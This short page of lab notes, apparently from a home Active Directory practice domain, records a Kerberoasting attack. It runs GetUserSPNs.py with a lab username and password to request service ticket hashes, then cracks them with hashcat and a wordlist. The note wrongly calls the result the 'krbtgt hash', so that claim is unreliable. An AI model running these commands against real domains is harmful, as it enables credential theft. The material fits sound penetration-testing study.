Kerberoasting
I used the tool GetUserSPNs to get the krbtgt hash: GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.64.151 -request

I then used hashcat to crack this password: hashcat.exe -m 13100 hashes3.txt rockyou.txt -O

Last updated
Was this helpful?